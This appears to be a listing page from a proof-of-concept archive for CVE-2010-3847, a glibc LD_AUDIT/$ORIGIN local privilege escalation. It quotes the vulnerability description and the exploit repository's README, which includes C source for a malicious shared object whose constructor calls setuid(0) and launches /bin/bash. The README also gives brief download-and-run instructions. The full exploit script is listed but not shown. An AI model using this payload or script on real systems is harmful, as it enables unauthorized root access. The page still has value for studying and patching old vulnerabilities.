Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2010-3847 PoC — GNU C Library 后置链接漏洞

Source
https://github.com/magisterquis/cve-2010-3847
Associated Vulnerability
Title:GNU C Library 后置链接漏洞 (CVE-2010-3847)
Description:elf/dl-load.c in ld.so in the GNU C Library (aka glibc or libc6) through 2.11.2, and 2.12.x through 2.12.1, does not properly handle a value of $ORIGIN for the LD_AUDIT environment variable, which allows local users to gain privileges via a crafted dynamic shared object (DSO) located in an arbitrary directory.
Description
Script to take advantage of CVE-2010-3847
Readme
CVE-2010-3847 script
====================
Meant to automate the exploit discussed in
[http://marc.info/?l=full-disclosure&m=128776663124692&w=2].  Tested on
CentOS 5 x86.

The DSO it outputs is compiled from the following code:
```c
#include <sys/types.h>
#include <unistd.h>
#include <stdlib.h>
void __attribute__((constructor)) init()
{
   setuid(0);
   system("/bin/bash");
}
```

Usage
-----
Download it, put it somewhere executable, and run it.

Gotchas
-------
`/tmp` and wherever `ping` is have to be on the same filesystem.  If not,
adjust the paths accordingly.
File Snapshot

 [4.0K]  /data/pocs/6d1bc6840dcfa35f71366549bee1028f67aa34c5
├── [ 23K]  CVE-2010-3847.sh
├── [ 858]  LICENSE
└── [ 571]  README.md

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →